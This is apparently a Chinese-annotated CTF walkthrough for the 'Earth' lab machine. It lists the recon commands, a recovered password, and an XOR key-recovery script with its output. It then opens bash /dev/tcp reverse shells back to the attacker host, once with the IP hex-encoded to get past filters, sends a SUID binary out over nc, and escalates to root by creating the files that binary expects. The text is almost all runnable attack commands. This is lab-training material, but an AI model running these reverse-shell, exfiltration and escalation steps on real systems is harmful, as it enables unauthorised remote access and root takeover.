192.168.113.129 靶机
192.168.113.128 Kali
sudo passwd root
su root
nmap 192.168.113.0/24
nmap -A 192.168.113.128
vim /etc/hosts
dirb https://earth.local
dirb https://terratest.earth.local
192.168.230.131/24 ip
192.168.230.134 靶机
earth.local terratest.earth.local
terra earthclimatechangebad4humans
bash -i >& /dev/tcp/0xC0.0xA8.0xE6.0x83/1234 0>&1 第一次反弹
nc -lvvp 1234
nc 192.168.43.118 1234 < /usr/bin/reset_root 第二次反弹
nc -nlvp 1234 >reset_root
find / -perm -u=s -type f 2>/dev/null
破译密码 用户名:terra earthclimatechangebad4humans
wget https://terratest.earth.local/testdata.txt --no-check-certificate 安装。。
vim xor.py 新建文件
# Known-plaintext recovery of an XOR key: if c = p ^ k, then c ^ p = k.
# Given the hex blob in key1 and the plaintext it was XOR-ed with (decode_txt),
# XOR-ing the two yields the key stream. Lesson for defenders: XOR with a fixed
# or repeating key is not encryption — one known plaintext exposes the key for
# every message protected with it.
import binascii
# Hex ciphertext (redacted in this copy). NOTE(review): presumably the contents
# of the testdata.txt fetched above — confirm. No whitespace/newline stripping
# is done, so the string must be pure hex or int(key1, 16) raises ValueError.
key1="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"
# Known plaintext (bytes), assumed to line up byte-for-byte with the ciphertext.
decode_txt = b"According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."
# Plaintext as a hex string so both operands can be parsed as big integers.
testdata = binascii.b2a_hex(decode_txt).decode()
# Integer XOR aligns the operands at their least-significant end and hex()
# drops leading zero nibbles, so this only reproduces the key byte-for-byte
# when both hex strings have equal length and the key has no leading 0x00
# bytes; a bytewise XOR would avoid that caveat. The printed value (a repeating
# pattern, see the hex dump below) is the key; a trailing 'L' means it was run
# under Python 2, where hex() of a long carries that suffix.
print(hex(int(key1,16) ^ int(testdata,16)))
python xor.py 运行
0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174L
https://www.toolscat.com/decode/hex 十六进制转换为字符
nc -nvlp 1111
bash -i >& /dev/tcp/0xC0A87180/1111 0>&1
find / -perm -u=s -type f 2>/dev/null 查看root特殊错误文件 都行 find / -perm -4000 2>/dev/null 查看三个文件
nc 0xC0A87180 7711 < /usr/bin/reset_root 监听kali
nc -lvvp 7777>reset_root 监听
apt-get install strace 下载
sudo apt-get install strace
chmod 777 reset_root 提权
strace ./reset_root 查看缺失文件
添加缺失文件:
touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe
/usr/bin/reset_root 拿到root密码
su root
ls /root
cat root/root_flag.txt